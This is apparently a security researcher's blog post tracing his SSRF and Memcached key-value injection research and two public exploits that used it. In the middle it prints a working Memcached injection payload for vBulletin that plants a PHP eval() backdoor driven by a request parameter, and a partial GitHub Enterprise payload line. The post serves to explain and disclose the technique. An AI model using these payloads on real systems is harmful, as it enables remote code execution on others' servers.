SSRF, Memcached and other key-value injections in the wild

Back in 2012 we released SSRF a different techniques to exploit Memcached servers and other services with host-based authentication through SSRF.

Two years after, in 2014, I presented a Memcached injection techniques at Black Hat USA https://www.blackhat.com/docs/us-14/materials/us-14-Novikov-The-New-Page-Of-Injections-Book-Memcached-Injections-WP.pdf. There I mentioned that it’s possible to exploit it as a Remote Code Execution vulnerabilities in case of the data unserialization at application side.

Then in 2016 I released the same approach for other key-value databases, such a Redis, Riak, CouchDB (http://www.syscan.org/slides/2016_SG_Ivan_Novikov_Key-value_injections_here.pdf)

And I am very pleased that all these studies were not in vain!

Two years ago (2015) we registered the first public exploit for vBulletin which used an SSRF vulnerability to inject arbitrary serialized data into Memcached. Here it is:

The payload there looks like:

set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}";

It’s a PHP serialized data that is putting into the Memcahed key “pluginlist”. Value from this key will be read by vBulletin then unserialized and executed.

This year the second SSRF/Memcahed exploit was released. It’s a GitHub Enterprise vulnerability

https://www.exploit-db.com/exploits/42392/

The payload listed below:

set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 <LEN>

As you can see, it’s a Ruby marshal serialized data. The payload is almost the same as previous one but with the different serialization format.

So, it’s really cool that my previous research found some practical applications. I hope that somebody will find smth with a Python/Pickle finally ;)

Enjoy!

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store